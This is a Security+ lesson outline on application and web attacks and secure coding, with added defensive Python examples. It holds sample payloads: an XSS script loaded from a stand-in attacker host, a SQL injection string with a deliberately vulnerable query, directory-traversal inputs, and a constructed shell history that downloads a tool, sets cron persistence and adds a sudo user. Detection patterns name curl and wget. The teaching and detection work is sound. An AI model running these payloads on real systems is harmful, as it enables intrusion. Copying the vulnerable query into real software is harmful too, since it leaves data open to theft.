Lesson 14

Summarizing Secure Application Concepts


Application Attacks
• Attacks that target vulnerabilities in application code
(An application vulnerability is a design flaw that can cause the application security
system to be circumvented or that will cause the application to crash.)
• Privilege escalation
• The purpose of most application attacks is to allow the threat actor to run his or her own code
on the system. This is referred to as arbitrary code execution. Where the code is transmitted
from one machine to another, it can be referred to as remote code execution. The code would
be designed to install some sort of backdoor or to disable the system in some way.
• Gain the privileges of the vulnerable target process to run arbitrary code
• Vertical and horizontal privilege escalation
• Vertical privilege escalation (or elevation) is where a user or application can access
functionality or data that should not be available to them
• Horizontal privilege escalation is where a user accesses functionality or data that is
intended for another user

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 2
Overflow Vulnerabilities
• Buffer overflow
• Buffer is memory allocated to application
• The threat actor submits input that is too large to be stored in a variable assigned by the application.
• To exploit a buffer overflow vulnerability, the attacker passes data that deliberately overfills the
buffer. One of the most common vulnerabilities is a stack overflow.
• Integer overflow
• Cause application to calculate values that are out-of-bounds
• Could use to cause crash or use in buffer overflow attack
• An integer overflow attack causes the target software to calculate a value that exceeds the bounds of the integer type it is stored in. This may cause a positive number to become negative (changing a bank debit to a credit).

Memory Leaks and Resource Exhaustion

• Memory leaks
• Process allocates memory locations, but never releases them
• Can cause host to run out of memory
• Could be faulty code or could be malicious

DLL Injection

• Dynamic Link Library (DLL) implements some function that multiple processes can use
• DLL injection is a vulnerability in the way the operating system allows one process to attach to another. This functionality can be abused by malware to force a legitimate process to load a malicious link library.
• A process that has been compromised by DLL injection might open unexpected network connections, or interact with files and the registry suspiciously.
• Refactoring might allow code obfuscation to elude anti-virus. Refactoring means that the A-V software may no longer identify the malware by its signature.

Pass the Hash Attack
• Attackers can extend their lateral movement if they are able to compromise host credentials. One common credential exploit technique for lateral movement is called pass the hash (PtH).
• Malware executes another process on a remote host
• Attacker can just pass hash without having to crack it
• Remote host will accept hash as credential
• Detection through security log events
Images © 123rf.com.
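The "detection through security log events" point, as an added example that is not part of the CompTIA slides: a heuristic scorer run over constructed Windows Security event records laid out like event 4624 (successful logon). The baseline of expected account/workstation pairs, the scoring weights and the threshold are assumptions for this example; a hit is a lead for an analyst, not proof of pass the hash.

```python
from typing import Dict, List, Set, Tuple

Event = Dict[str, object]

# Constructed sample events; only the fields the heuristic reads are included.
SAMPLE_EVENTS: List[Event] = [
    # normal interactive logon at the console
    {"EventID": 4624, "LogonType": 2, "AuthenticationPackageName": "Negotiate",
     "LogonProcessName": "User32", "KeyLength": 0, "TargetUserName": "alice",
     "IpAddress": "-", "WorkstationName": "WS01"},
    # normal network logon, Kerberos authenticated
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "LogonProcessName": "Kerberos", "KeyLength": 0, "TargetUserName": "alice",
     "IpAddress": "10.0.0.21", "WorkstationName": "WS01"},
    # NTLM network logon from the host this account normally uses
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "LogonProcessName": "NtLmSsp", "KeyLength": 128, "TargetUserName": "bob",
     "IpAddress": "10.0.0.22", "WorkstationName": "WS02"},
    # NTLM network logon for a service account from an unexpected workstation
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "LogonProcessName": "NtLmSsp", "KeyLength": 0, "TargetUserName": "svc_backup",
     "IpAddress": "10.0.0.55", "WorkstationName": "WS07"},
]

# Assumed baseline: the workstation each account normally authenticates from.
BASELINE: Set[Tuple[str, str]] = {("alice", "WS01"), ("bob", "WS02"), ("svc_backup", "BACKUP01")}


def pth_score(event: Event, baseline: Set[Tuple[str, str]]) -> int:
    """Score one logon event for pass-the-hash likelihood (heuristic).
    PtH tooling typically produces a network (type 3) logon authenticated with
    NTLM rather than Kerberos, arriving from a host the account does not use."""
    if event.get("EventID") != 4624 or event.get("LogonType") != 3:
        return 0
    score = 0
    if (event.get("AuthenticationPackageName") == "NTLM"
            and event.get("LogonProcessName") == "NtLmSsp"):
        score += 1
    if event.get("KeyLength") == 0:
        score += 1  # empty key length alongside NTLM is a commonly cited PtH trait (heuristic)
    if (event.get("TargetUserName"), event.get("WorkstationName")) not in baseline:
        score += 2  # account seen from a workstation outside its baseline
    return score


def flag_pth_candidates(events: List[Event], baseline: Set[Tuple[str, str]],
                        threshold: int = 3) -> List[Tuple[str, str, str]]:
    """Return (user, source IP, workstation) for events scoring at or above threshold."""
    hits = []
    for ev in events:
        if pth_score(ev, baseline) >= threshold:
            hits.append((str(ev["TargetUserName"]), str(ev["IpAddress"]),
                         str(ev["WorkstationName"])))
    return hits


if __name__ == "__main__":
    for hit in flag_pth_candidates(SAMPLE_EVENTS, BASELINE):
        print("review NTLM network logon:", hit)
```

In a real environment the baseline comes from weeks of logon history, and the NTLM/Kerberos split matters most on domain-joined hosts where Kerberos is the expected package.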

Topic 14B
Analyze Indicators of Web Application Attacks

A web application exposes many interfaces to public networks. Attackers can exploit vulnerabilities in server software and in client browser security to perform injection and session hijacking attacks that compromise data confidentiality and integrity.
Uniform Resource Locator Analysis
• A URL can encode some action or data to submit to the server host. This is a common vector for malicious activity.
• HTTP methods
  • TCP connections
  • GET, POST, PUT
  • POST or PUT
  • URL (query parameters)
  • HTTP response codes
• GET: used to retrieve a resource
• POST: send data to the server for processing by the requested resource
• PUT: create or replace the resource. DELETE can be used to remove the resource
• HEAD: retrieve the headers for a resource only (not the body)

Application Programming Interface Attacks

Some other common attacks against APIs target the following weaknesses and
vulnerabilities:
• Ineffective secrets management, allowing threat actors to discover an API key
and perform any action authorized to that key.
• Lack of input validation, allowing the threat actor to insert arbitrary
parameters into API methods and queries. This is often referred to as allowing
unsanitized input.
• Error messages revealing clues to a potential adversary. For example, an authentication
error should not reveal whether a valid username has been rejected because of an invalid password. The error should
simply indicate an authentication failure.
• Denial of service (DoS) by bombarding the API with spurious calls.
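The "error messages revealing clues" weakness, as an added example that is not part of the CompTIA slides: a login function that returns different messages for an unknown username and a wrong password, beside a hardened version that does the same hashing work and returns the same generic message in both cases. The user store, salts and password are constructed for this example.

```python
import hashlib
import hmac
from typing import Tuple


def hash_password(password: str, salt: bytes) -> bytes:
    """PBKDF2-HMAC-SHA256; the iteration count is kept modest for the example."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 50_000)


# Constructed user store: username -> (salt, password hash). Fixed salts keep it deterministic.
_ALICE_SALT = b"constructed-salt-alice"
USERS = {"alice": (_ALICE_SALT, hash_password("correct horse battery staple", _ALICE_SALT))}

# Dummy credential used for unknown usernames so the hashing work (and so the
# response time) is the same whether or not the account exists.
_DUMMY_SALT = b"constructed-salt-dummy"
_DUMMY = (_DUMMY_SALT, hash_password("", _DUMMY_SALT))


def authenticate_leaky(username: str, password: str) -> Tuple[bool, str]:
    """Weak: two failure messages tell the caller which usernames are valid."""
    if username not in USERS:
        return False, "unknown user"
    salt, stored = USERS[username]
    if hash_password(password, salt) != stored:
        return False, "wrong password"
    return True, "ok"


def authenticate(username: str, password: str) -> Tuple[bool, str]:
    """Hardened: one generic failure message, the same amount of work, and a
    constant-time digest comparison, whether or not the username exists."""
    salt, stored = USERS.get(username, _DUMMY)
    match = hmac.compare_digest(hash_password(password, salt), stored)
    if match and username in USERS:
        return True, "ok"
    return False, "authentication failed"


if __name__ == "__main__":
    print(authenticate_leaky("mallory", "guess"))  # reveals the account does not exist
    print(authenticate("mallory", "guess"))        # reveals nothing
```

The dummy credential matters as much as the message: if the unknown-user path skipped the hash, the response time would leak the same information the message used to.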

Replay Attacks
• A replay attack is a form of network attack in which valid data transmission is maliciously or fraudulently repeated or delayed.
• A replay attack works by sniffing or guessing the token value and then submitting it to re-establish the session illegitimately.

Session Hijacking
• Session hijacking most often means replaying a cookie in some way. Attackers can sniff network traffic to obtain session cookies sent over an unsecured network.
• Client-side/cross-site request forgery (CSRF/XSRF)
  • Passes a URL to another site where the user has an authenticated session
• To counter cookie hijacking, you can encrypt cookies during transmission, delete cookies from the client's browser cache when the client terminates the session, and design your web app to deliver a new cookie with each new session between the app and the client's browser.
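The three countermeasures just listed, as an added example that is not part of the CompTIA slides: a server-side session store that issues a fresh random identifier per session, deletes the session on logout so a captured cookie cannot be replayed, and emits a Set-Cookie header with the Secure, HttpOnly and SameSite attributes. The class and function names are constructed; the injectable clock exists only so expiry can be exercised deterministically.

```python
import secrets
import time
from typing import Callable, Dict, Optional, Tuple


class SessionStore:
    """Server-side session table keyed by an unguessable identifier."""

    def __init__(self, ttl_seconds: int = 900, clock: Callable[[], float] = time.time):
        self.ttl = ttl_seconds
        self.clock = clock  # injectable for deterministic expiry tests
        self._sessions: Dict[str, dict] = {}

    def start(self, username: str) -> str:
        """New session, new identifier: 256 bits from the OS CSPRNG."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": username, "expires": self.clock() + self.ttl}
        return sid

    def validate(self, sid: str) -> Optional[str]:
        """Return the user for a live session, or None if unknown or expired."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if entry["expires"] <= self.clock():
            del self._sessions[sid]
            return None
        return entry["user"]

    def end(self, sid: str) -> None:
        """Logout: forget the session so the cookie value is worthless afterwards."""
        self._sessions.pop(sid, None)


def set_cookie_header(sid: str) -> str:
    """Secure keeps the cookie off plaintext HTTP, HttpOnly keeps it away from page
    scripts, SameSite=Strict stops the browser attaching it to cross-site requests,
    and omitting Max-Age/Expires makes it a session cookie discarded on browser exit."""
    return f"sessionid={sid}; Path=/; Secure; HttpOnly; SameSite=Strict"


def demo_replay() -> Tuple[Optional[str], bool, Optional[str]]:
    """Walk through logout, replay of the old cookie, re-login and expiry."""
    now = [1000.0]
    store = SessionStore(ttl_seconds=60, clock=lambda: now[0])
    first = store.start("alice")
    assert store.validate(first) == "alice"
    store.end(first)                      # user logs out
    replayed = store.validate(first)      # captured cookie replayed: rejected
    second = store.start("alice")         # next login gets a different identifier
    now[0] += 61                          # time passes beyond the TTL
    expired = store.validate(second)      # idle session rejected as well
    return replayed, first != second, expired


if __name__ == "__main__":
    print(demo_replay())
    print(set_cookie_header(secrets.token_urlsafe(32)))
```

Transport encryption (TLS) is what the Secure attribute relies on; the attribute only stops the browser sending the cookie over a plaintext connection.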

Clickjacking

• Add invisible layer to intercept/redirect click events
• Clickjacking is an attack where what the user sees and trusts as a web application with some sort of login page or form contains a malicious layer or invisible iFrame that allows an attacker to intercept or redirect user input.

Cross-Site Scripting (XSS)
• Attacker injects code in trusted site that will be executed in client browser
• A client-side or cross-site request forgery (CSRF or XSRF) can exploit applications that use cookies to authenticate users and track sessions. The attacker must convince the victim to start a session with the target site. The attacker must then pass an HTTP request to the victim's browser that spoofs an action on the target site.

Examples from the slide:
  Check out this amazing <a href="https://trusted.foo">website</a><script src="https://badsite.foo/hook.js"></script>.
  https://trusted.foo/messages#user=James%3Cscript%20src%3D%22https%3A%2F%2Fbadsite.foo%2Fhook.js%22%3E%3C%2Fscript%3E
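The URL analysis from Topic 14B and the percent-encoded XSS payload above, as one added example that is not part of the CompTIA slides: the URL is split into path, query and fragment, every component is percent-decoded (twice, to catch double encoding), decoded values are checked for script-injection markers, and the value is shown HTML-encoded as it should be before being written into a page. The marker patterns and function names are constructed for this example.

```python
import re
from html import escape
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Injection markers looked for after decoding: script tags, javascript: URLs,
# and the common inline event-handler attributes.
SCRIPT_MARKERS = re.compile(
    r"<\s*script\b|javascript\s*:|\bon(click|load|error|mouseover)\s*=", re.IGNORECASE)

# Encoded URL from the slide, used as sample input.
SLIDE_URL = ("https://trusted.foo/messages#user=James%3Cscript%20src%3D%22https%3A"
             "%2F%2Fbadsite.foo%2Fhook.js%22%3E%3C%2Fscript%3E")


def _pairs(component: str) -> Dict[str, List[str]]:
    """Split a query or fragment into key/value lists, percent-decoding each value.
    parse_qs decodes once; the extra unquote catches values encoded twice."""
    return {k: [unquote(v) for v in vs]
            for k, vs in parse_qs(component, keep_blank_values=True).items()}


def analyze_url(url: str) -> Dict[str, object]:
    """Decoded view of the parts of a URL that can carry data to the server or the page."""
    parts = urlsplit(url)
    return {"path": unquote(parts.path),
            "query": _pairs(parts.query),
            "fragment": _pairs(parts.fragment)}


def find_script_indicators(url: str) -> List[Tuple[str, str]]:
    """Return (location, decoded value) for every component carrying a script marker."""
    analysed = analyze_url(url)
    hits: List[Tuple[str, str]] = []
    if SCRIPT_MARKERS.search(analysed["path"]):
        hits.append(("path", analysed["path"]))
    for where in ("query", "fragment"):
        for key, values in analysed[where].items():
            for value in values:
                if SCRIPT_MARKERS.search(value):
                    hits.append((f"{where}:{key}", value))
    return hits


def encode_for_html(value: str) -> str:
    """Output encoding for an HTML text or attribute context: <, >, &, quotes become entities,
    so the browser renders the payload as text instead of executing it."""
    return escape(value, quote=True)


if __name__ == "__main__":
    for location, value in find_script_indicators(SLIDE_URL):
        print(location, "->", value)
        print("safe to render as:", encode_for_html(value))
```

Note that the payload sits in the fragment, which the browser never sends to the server: only client-side code (or a proxy log that captured the full URL) can see it, which is why DOM-based injection needs client-side analysis rather than server logs alone.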

Structured Query Language Injection Attacks

• Injection-type attacks
• Structured Query Language (SQL) statements
  • SELECT, INSERT, DELETE, UPDATE, WHERE
• SQL injection
  • Pass SQL statements to the web application via user input or URL
  • Show or insert database records
  • Example of an injected statement: SELECT * FROM tbl_user WHERE username = '' or 1=1--#
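The injected statement above, as an added example that is not part of the CompTIA slides: an in-memory SQLite table standing in for tbl_user, a lookup that pastes user input into the statement text (and so returns every row for the slide's input), and the parameterized form that treats the same input as a plain string. Table contents and function names are constructed for this example.

```python
import sqlite3
from typing import List, Tuple

# The input that produces the slide's statement once concatenated after username = '
INJECTED_INPUT = "' or 1=1--#"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbl_user (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany("INSERT INTO tbl_user (username, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user")])
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> List[Tuple]:
    """Unsafe: the input becomes part of the SQL text, so its quote closes the
    string literal, `or 1=1` makes the WHERE clause always true, and `--`
    comments out the rest of the statement."""
    sql = f"SELECT id, username, role FROM tbl_user WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> List[Tuple]:
    """Parameterized query: the statement is fixed and the value travels separately,
    so the input is only ever compared as a string and never parsed as SQL."""
    return conn.execute(
        "SELECT id, username, role FROM tbl_user WHERE username = ?", (username,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", find_user_vulnerable(db, INJECTED_INPUT))  # both rows
    print("safe:      ", find_user_safe(db, INJECTED_INPUT))        # no rows
```

The safe version needs no input filtering to be correct; escaping quotes by hand is the approach that historically went wrong, whereas binding parameters removes the parsing step altogether.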

Directory Traversal

• Directory traversal
• Obtain access to files outside web site root directory

The threat actor submits a request for a file outside the web server's root directory
by submitting a path to navigate to the parent directory (../). This attack can succeed
if the input is not filtered properly and access permissions on the file are the same
as those on the web server directory.
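The filtering the text says is missing, as an added example that is not part of the CompTIA slides: a function that maps a requested path onto the web root, canonicalises it, and refuses anything whose canonical form leaves the root, including ../ sequences, absolute paths and percent-encoded (or double-encoded) variants. The web root path and sample requests are constructed for this example.

```python
import os
from typing import Optional
from urllib.parse import unquote


def resolve_in_webroot(webroot: str, requested: str) -> Optional[str]:
    """Return the requested file's path relative to the web root, or None when the
    request would escape the root. Canonicalising both sides before comparing
    is what makes the check hold regardless of how the traversal was spelled."""
    root = os.path.realpath(webroot)
    candidate = unquote(unquote(requested))  # decode twice to catch %252e%252e style inputs
    # os.path.join discards `root` when `candidate` is absolute, so an absolute
    # request resolves outside the root and is rejected by the prefix check below.
    full = os.path.realpath(os.path.join(root, candidate))
    if os.path.commonpath([root, full]) != root:
        return None
    return os.path.relpath(full, root)


if __name__ == "__main__":
    WEBROOT = "/var/www/html"  # constructed; need not exist for the check to work
    for req in ("images/logo.png", "../../etc/passwd", "..%2F..%2Fetc%2Fpasswd",
                "%252e%252e/%252e%252e/etc/passwd", "/etc/passwd", "docs/../index.html"):
        print(f"{req!r:40} -> {resolve_in_webroot(WEBROOT, req)}")
```

The second half of the slide's condition (file permissions equal to those of the web directory) is the other layer: even if the path check were bypassed, a web server account that cannot read files outside its document root gets nothing.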

Topic 14C
Summarize Secure Coding Practices

Static Code Analysis

• Static/source code analysis
  • Submit code for analysis by automated software
• Manual code review
  • Human analysis of source code

Some of the most important coding practices are input validation, output encoding, and error handling.
Normalization means that a string is stripped of illegal characters or substrings and converted to the accepted character set. Output encoding means that the string is re-encoded safely for the context in which it is being used.
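Normalization, input validation and output encoding, as an added example that is not part of the CompTIA slides: a normalizer that collapses Unicode compatibility forms and drops control/format characters, an allow-list validator built on it, and an output encoder for a URL query context (the HTML context is the other common one). The username rule and sample strings are constructed for this example.

```python
import re
import unicodedata
from urllib.parse import quote

# Allow list for an account name after normalization: lower-case ASCII letters,
# digits and a few separators, 1 to 32 characters. Constructed rule.
USERNAME_RULE = re.compile(r"[a-z0-9._-]{1,32}")


def normalize(text: str) -> str:
    """Canonicalise to NFKC so look-alike and full-width forms collapse to one
    spelling, drop control (Cc) and format (Cf) characters such as zero-width
    spaces, then trim and lower-case."""
    text = unicodedata.normalize("NFKC", text)
    text = "".join(ch for ch in text if unicodedata.category(ch) not in ("Cc", "Cf"))
    return text.strip().lower()


def validate_username(raw: str) -> str:
    """Normalize, then accept only what the allow list permits. The error message is
    deliberately generic: it does not say which rule the input broke."""
    value = normalize(raw)
    if not USERNAME_RULE.fullmatch(value):
        raise ValueError("invalid username")
    return value


def is_valid_username(raw: str) -> bool:
    try:
        validate_username(raw)
        return True
    except ValueError:
        return False


def encode_for_url_query(value: str) -> str:
    """Output encoding for a URL query component: every reserved character is
    percent-encoded so the value cannot add or alter parameters."""
    return quote(value, safe="")


if __name__ == "__main__":
    print(normalize("\u2009\uff2a\uff41\uff4d\uff45\uff53\u200b"))  # full-width 'James' with padding
    print(is_valid_username("<script>"), is_valid_username("james.01"))
    print(encode_for_url_query("a b&c=d"))
```

Order matters: validate after normalizing, never before, otherwise a full-width or zero-width variant slips past the allow list and is normalized into a different string later.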

Dynamic Code Analysis

• Run application in a staging environment for testing
• "stress testing"

Screenshot Burp Suite portswigger.net/burp.


Topic 14D
Implement Secure Script Environments

Scripting

• Automation of activity through programs and scripts
• Basic elements of a script
  • Parameters
  • Branching and looping statements
  • Validation and error handlers
  • Testing

Python Script Environment

• Basic syntax elements
  • Case sensitivity and indentation
• Variables
  • Assignment and typing
• Functions
  • Declaring functions
• Logic and looping statements
  • Comparison operators
  • Control blocks
• Modules
  • Libraries of functions
• Execution
  • Within interpreter or compiled

Example from the slide:

    def fullname(name, surname):
        return name + " " + surname
    # This ends the function definition
    # The next line calls the function
    greeting = 'Hello ' + fullname('World', '')
    print(greeting)

Execution Control

• Prevent use of unauthorized code
• Allow lists and block lists
  • Allow list control means that nothing can run if it is not on the approved list
  • Block list control means that anything not on the prohibited list can run

Malicious Code Indicators
• Detection through monitoring platforms or host/process behavior
analysis. The main types of malicious activity:
• Shellcode: creates a process or injects a DLL
• Credential dumping: the malware might try to access the credentials file
• Lateral movement/insider attack
• Persistence: restarting backdoor

Bash and Python Malicious Indicators
• Bash (Bourne Again Shell): the scripting shell of the Linux command line
• A malicious script running on a Linux host might attempt the following:
  1. Use commands such as whoami and ifconfig/ip/route to establish the local context.
  2. Download tools, possibly using wget or curl.
  3. Add crontab entries to enable persistence.
  4. Add a user to sudo and enable remote access via SSH.
  5. Change firewall rules using iptables.
  6. Use tools such as Nmap to scan for other hosts.
• Malicious indicators
  • Reconnaissance-type activity
  • Download tools
  • Account/firewall configuration changes
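The six-step sequence and the three indicator classes above, as one added example that is not part of the CompTIA slides: a classifier that tags each line of a shell history (or an auditd/bash-logging export) with the stage it belongs to and treats a session that spans several stages as suspicious. The regular expressions, the sample histories and the threshold are constructed for this example; the download host is a placeholder.

```python
import re
from typing import Dict, List

# One pattern per stage in the slide's list. Constructed; tune to your environment.
STAGE_PATTERNS: Dict[str, "re.Pattern[str]"] = {
    "reconnaissance":  re.compile(r"^\s*(whoami|id|hostname|ifconfig|ip\s+(a|addr|route)|route)\b"),
    "download":        re.compile(r"^\s*(wget|curl)\b"),
    "persistence":     re.compile(r"\bcrontab\b|/etc/cron"),
    "account_change":  re.compile(r"\b(useradd|usermod\s+-aG\s+sudo|visudo|/etc/sudoers|authorized_keys)\b"),
    "firewall_change": re.compile(r"^\s*(sudo\s+)?iptables\b"),
    "scan":            re.compile(r"^\s*(sudo\s+)?nmap\b"),
}

# Constructed sample histories.
MALICIOUS_HISTORY: List[str] = [
    "whoami",
    "ip addr",
    "curl -s http://example.invalid/tool.sh -o /tmp/t.sh",   # placeholder host
    "chmod +x /tmp/t.sh",
    "(crontab -l; echo '@reboot /tmp/t.sh') | crontab -",
    "useradd -m svc && usermod -aG sudo svc",
    "sudo iptables -I INPUT -p tcp --dport 2222 -j ACCEPT",
    "nmap -sn 10.0.0.0/24",
]
BENIGN_HISTORY: List[str] = ["ls -la", "git status", "python3 app.py", "tail -f app.log"]


def classify_line(line: str) -> List[str]:
    """Stages whose pattern matches this line (usually zero or one)."""
    return [stage for stage, pattern in STAGE_PATTERNS.items() if pattern.search(line)]


def summarize_history(lines: List[str]) -> Dict[str, List[str]]:
    """Map each observed stage to the lines that triggered it."""
    summary: Dict[str, List[str]] = {}
    for line in lines:
        for stage in classify_line(line):
            summary.setdefault(stage, []).append(line)
    return summary


def is_suspicious(summary: Dict[str, List[str]], min_stages: int = 3) -> bool:
    """A single recon or download command is normal admin work; several distinct
    stages in one session is the pattern worth escalating."""
    return len(summary) >= min_stages


if __name__ == "__main__":
    report = summarize_history(MALICIOUS_HISTORY)
    for stage, hits in report.items():
        print(f"{stage:16} {hits}")
    print("suspicious:", is_suspicious(report))
```

The stage count, not any single command, carries the signal: whoami and curl appear in ordinary administration all day, while recon followed by a download, a cron entry, a sudo change and a firewall change in one session is the sequence the slide describes.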

Visual Basic for Applications (VBA)

• VBA stands for Visual Basic for Applications, an event-driven programming language from Microsoft. It is now predominantly used with Microsoft Office applications such as MS Excel, MS Word and MS Access.

Man-in-the-Browser Attack
• Compromise browser
• Inspect session data
• Change browser settings
• Perform redirection
• Perform code injection
• Malicious plug-in/script/DLL

Screenshot: Browser Exploitation Framework (beefproject.com).

Topic 14E
Summarize Deployment and Automation Concepts

Application Development, Deployment, and Automation

• DevSecOps and requirements for greater automation
• Completion of tasks without human intervention
• Automation facilitates better scalability and elasticity
  • Scalability means that the costs involved in supplying the service to more users are linear
  • Elasticity refers to the system's ability to handle changes on demand in real time

Secure Application Development Environments

• Software development life cycle (SDLC)
  • Waterfall and Agile
• Quality assurance (QA)
• Development environments
• Preserving environment integrity
  • Sandboxing
  • Secure baseline
  • Integrity measurement

Provisioning, Deprovisioning, and Version Control

• Provisioning is the process of deploying an application to the target environment
  • Installer/setup package
  • Instance (VM with OS and application)
• Deprovisioning is the process of removing an application from packages or instances
• Version control
• Customer version ID
• Developer build ID
• Source code version control
• Code commits and backups

Automation/Scripting Release Paradigms

• Waterfall versus Agile SDLCs
• Continuous integration
  • Commit updates often
  • Reduce commit conflicts
• Continuous delivery
  • Push updates to staging infrastructure
• Continuous deployment
  • Push updated code to production
• Continuous monitoring and automated courses of action
• Continuous validation

Software Diversity

• Runtime environment
• Compiled code
• Interpreted code
• Software diversity as obfuscation
• Security by diversity
• Avoid monocultures to make attacks harder to develop
